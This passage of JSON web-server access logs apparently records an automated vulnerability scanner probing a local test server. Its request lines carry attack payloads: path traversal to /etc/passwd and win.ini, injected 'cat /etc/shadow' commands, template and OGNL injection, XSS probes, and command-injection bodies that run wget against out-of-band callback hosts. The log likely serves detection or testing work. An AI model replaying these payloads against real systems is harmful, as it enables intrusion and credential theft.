"http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1/error.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpwiki/index.php/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json/a.ico?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/mobile.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /telescope/requests HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cfide-scripts/ajax/package/cfajax.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"POST /cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.000","http_user_agent":"-", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.tar.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/77 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /pages/createpage-entervariables.action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /DesktopModules/Admin/RadEditorProvider/DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/subscriptions HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%68%6f%73%74%73%22%29%7d HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jmx-console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.ssh/id_dsa HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/redirect.php?event1=demo_out&event2=sm_demo&event3=pdemo&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///apps HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /common/download/resource?resource=/profile/../../../../Windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1/errors.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json/a.png?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/firewall.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nagios/cgi-bin/status.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cfmx/CFIDE/scripts/ajax/package/cfajax.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"&uid=10; wget http://ca28fg0smpvbd3qg07h0o55cg68puphcn.oast.live","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /system/sharedir.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/78 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.xz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /confluence/pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /DesktopModule/UIQuestionControls/UIAskQuestion/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"__EVENTTARGET=cmdOK&__EVENTARGUMENT=&__VIEWSTATE=%C3%82%7B%7BVS%C3%82%7D%7D&__VIEWSTATEGENERATOR=%C3%82%7B%7BVSG%C3%82%7D%7D&__EVENTVALIDATION=%C3%82%7B%7BEV%C3%82%7D%7D&txtID=uname%27&txtPW=passwd&hdnClientDPI=96","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?id=nuclei%25{128*128} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jmx-console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.key HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/redirect.php?site_id=s1&event1=select_product_t1&event2=contributions&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///home HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /widgets/knowledgebase?topicId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MyErrors.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc%5cpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/prostore/go.php?https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json/a.html?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /interlib/report/ShowImage?localPath=etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/nagios4/status.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jquery-file-upload/server/php/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/79 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"&act=sync&task_number=1;wget http://ca28fg0smpvbd3qg07h04uoj585x6mdiu.oast.live","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /en/php/usb_sync.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.zip HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /confluence/pages/createpage-entervariables.action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Modules/CMS/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lostpassword.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/altair HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plus/download.php?open=1&link=aHR0cHM6Ly9ldmlsLmNvbQo= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jmx-console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.pem HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /metrics/v1/mbeans HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/redirect.php?event1=&event2=&event3=download&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.json 